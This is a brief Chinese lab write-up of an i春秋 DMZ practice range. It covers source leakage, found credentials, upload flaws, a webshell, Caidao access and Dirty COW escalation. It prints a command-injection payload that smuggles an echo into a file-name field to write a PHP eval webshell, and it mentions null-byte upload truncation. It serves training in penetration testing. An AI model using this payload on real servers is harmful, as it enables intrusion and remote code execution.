i春秋DMZ大型靶场实验(三)内网转发DMZ2 Safe 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

更具实验文件知道存在源码泄露  下载源码进行源码审计

i春秋DMZ大型靶场实验(三)内网转发DMZ2 Safe 第2张

发现admin账号

i春秋DMZ大型靶场实验(三)内网转发DMZ2 Safe 第3张

查看user.php 发现mysql 账号 端口

对登录后源码进行审计 发现上传文件的两处漏洞

i春秋DMZ大型靶场实验(三)内网转发DMZ2 Safe 第4张

对 fiel name 可以 %00 截断 上传一句话木马   对file name   shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如 

'|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||'

i春秋DMZ大型靶场实验(三)内网转发DMZ2 Safe 第5张

 

i春秋DMZ大型靶场实验(三)内网转发DMZ2 Safe 第6张

菜刀连接

i春秋DMZ大型靶场实验(三)内网转发DMZ2 Safe 第7张

 上传脏牛提权

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄